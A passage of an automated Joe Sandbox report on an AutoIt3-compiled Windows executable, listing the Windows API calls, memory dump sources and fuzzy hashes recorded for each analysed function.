                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FDBE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00FDBEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00FDBEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FDBEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00FDBEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                      • Instruction ID: c1467d2467fd6e4925a4ad42400969be147f366ac7ddf285217aae1efc7faa05
                                                                      • Opcode Fuzzy Hash: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                      • Instruction Fuzzy Hash: FCE06531504145AADF315F64FC0DBD83F21EB06332F248356FFA9480D587764580EB11
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00FF871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FF82E6), ref: 00FF872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                      • Instruction ID: 680de140a9d5f22817ae5418eaecc8fe528ad8f9609c45874f50fc2ad59530bf
                                                                      • Opcode Fuzzy Hash: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                      • Instruction Fuzzy Hash: 6FE04F36A112129BD7306EB05D4CB563BBCEF557E1F248858F285CA044DA2E84469750
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00FFB4BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      • Opcode ID: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                      • Instruction ID: 27cc84fe38aef31bdf757144812c91dca1a95bdfbec2b467d41d07a0cb0df6ce
                                                                      • Opcode Fuzzy Hash: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                      • Instruction Fuzzy Hash: 20916975600605AFDB54DF64C884B6ABBF9FF48710F24846DFA4ACB2A1DB70E841DB50
                                                                      APIs
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • __wcsnicmp.LIBCMT ref: 0100B02D
                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0100B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      • Opcode ID: b72685ec33d683c1f5917f945432b21841d5115611974d2f2467d37e30d49286
                                                                      • Instruction ID: 60ebc61668cd9e8464e3d90118c2d80181de915fa012f7a0d1025b200c1b9663
                                                                      • Opcode Fuzzy Hash: b72685ec33d683c1f5917f945432b21841d5115611974d2f2467d37e30d49286
                                                                      • Instruction Fuzzy Hash: 9361B279A00219AFDB15DF98C891EEEB7F4EF09310F4440A9F956AB291DB74AE40CB50
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00FB2968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FB2981
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                      • Instruction ID: c7486becd3cddd189587034ea2304d3334b4d16b760bd03825a020b1c3ba0e1c
                                                                      • Opcode Fuzzy Hash: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                      • Instruction Fuzzy Hash: 53516CB1408744ABE320EF50DC85BAFB7E8FF86344F81885DF2D841095DBB98929DB56
                                                                      APIs
                                                                        • Part of subcall function 00FA4F0B: __fread_nolock.LIBCMT ref: 00FA4F29
                                                                      • _wcscmp.LIBCMT ref: 01009824
                                                                      • _wcscmp.LIBCMT ref: 01009837
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      • Opcode ID: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                      • Instruction ID: 469c8a53b0b2569999169cc8a9c9fd6ead3833444196e26bc3e9f5ada9eea702
                                                                      • Opcode Fuzzy Hash: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                      • Instruction Fuzzy Hash: AF41D971A0020ABAEF219BA4CC45FEFBBFDDFC5714F004469F944A7181DAB5AA049B61
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010125D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      • Opcode ID: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                      • Instruction ID: 1c92e561d99f61328909c6c3822aab330e192ffc5e314307787479650630e1e2
                                                                      • Opcode Fuzzy Hash: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                      • Instruction Fuzzy Hash: DA3146B1800209EBCF01EFA5CC85EEEBFB8FF09340F100059F915A6166EB395A56DB60
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 01027B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01027B76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                      • Instruction ID: 40f1170545f142ddace434d851e3fbc2c0b8abd5ce745f0516df758a17f186c7
                                                                      • Opcode Fuzzy Hash: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                      • Instruction Fuzzy Hash: 25413B74A0121A9FDB54CFA8C880BDABBF5FF48310F1001AAEA44AB341D731A951CF90
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 01026B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01026B53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                      • Instruction ID: 6158dc4b38ea7c7f36cb294698072d9f99e5537802d4bf84fe837ea5f9da1b2b
                                                                      • Opcode Fuzzy Hash: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                      • Instruction Fuzzy Hash: A6319E71200214AEEB119F69CC80BFB77F9FF49760F108619F9E997190DA36AC91DB60
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0100294C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: d41314196090f143dfc98da1d5c6385394a201d22ba6cad01d79c9b9734e7449
                                                                      • Instruction ID: f6f6bbd1eda1ec4ff7f0d2dd513dbd7ea86fdaa43870dbb687a65a3eb649b1bf
                                                                      • Opcode Fuzzy Hash: d41314196090f143dfc98da1d5c6385394a201d22ba6cad01d79c9b9734e7449
                                                                      • Instruction Fuzzy Hash: 3C3191316003069BFB66CE9CCD89BAEBFF8EF45390F140099EAC5A61E1DB709544CB52
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 01013A66
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf_memmove
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3506404897-2584243854
                                                                      • Opcode ID: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                      • Instruction ID: 1efe95262c9f05985eac74e6ca866801c70ec09e0b884fd7692ccee9bd9f9f82
                                                                      • Opcode Fuzzy Hash: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                      • Instruction Fuzzy Hash: 3E21E471A00219AFCF10EF65CC82EAE7BB9BF45720F804459F945AF142DB38E941DB61
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01026761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0102676C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                      • Instruction ID: 42c2f03f13e41523d80608a7d3c5d037512773537a7ea9688c26c5e5dc9a3317
                                                                      • Opcode Fuzzy Hash: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                      • Instruction Fuzzy Hash: CA11E975200119AFEF618E18DC84EBB37AAFB49394F100125FD9497291E636DC5087A0
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • GetWindowRect.USER32(00000000,?), ref: 01026C71
                                                                      • GetSysColor.USER32(00000012), ref: 01026C8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                      • Instruction ID: ce7431ca93015295eaa23fa71ca943cfd34fdda80ce088d85b4fc12019afe58e
                                                                      • Opcode Fuzzy Hash: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                      • Instruction Fuzzy Hash: A9211472A1021AAFDB15DFA8C845AFA7BB8FB08354F104629FD95D3240D63AE8509B60
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 010269A2
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010269B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                      • Instruction ID: f8da35558eda9242706d2528760d09ee4ec7a930f3e988e33c0f018abfc7f227
                                                                      • Opcode Fuzzy Hash: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                      • Instruction Fuzzy Hash: FE116A71600229ABEB618E68DC44EEB3BADEB053B4F504754FEE1961D0CA36DC519BA0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002A22
                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01002A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                      • Instruction ID: dfa69ec7a49176f8699b7b6a4f76543d38eb7739b913d96bd5f97141604c1fd1
                                                                      • Opcode Fuzzy Hash: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                      • Instruction Fuzzy Hash: FF11B932901124ABFF76DE5CDC48BAE77F8AB46390F044091E9D5E72D0DB70A945C791
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101222C
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01012255
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                      • Instruction ID: 30191efc4627eecfa95bbd29f593842300d289fb36375a9199dcc2aa46e9ea2a
                                                                      • Opcode Fuzzy Hash: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                      • Instruction Fuzzy Hash: 75110270501225FADB258F158C88EFFFFA8FF06291F20826AFA8486004E2785894C6F0
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FF8E73
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
                                                                      • Instruction ID: 2ffc7940531c02fee8533ab013164aa29f6c58844a24a0d88aee2a14bcdc9efd
                                                                      • Opcode Fuzzy Hash: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
                                                                      • Instruction Fuzzy Hash: 8701F1B1A41219AB8B14EBE0CC41DFE7368EF0A360B100A09F9656B2E1DE39580CE650
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
